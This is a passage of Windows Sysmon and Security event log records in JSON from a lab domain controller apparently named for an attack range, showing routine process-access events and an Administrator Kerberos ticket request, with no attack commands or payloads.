C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2460,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2461,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2462,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2463,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2464,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2465,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01DD-5F25-0000-0010D9560400}\r\nSourceProcessId: 4116\r\nSourceThreadId: 4136\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-0010FB590400}\r\nTargetProcessId: 4192\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01DD-5F25-0000-0010D9560400}","SourceProcessId":"4116","SourceThreadId":"4136","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-0010FB590400}","TargetProcessId":"4192","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2466,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.828\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.828","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220326,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
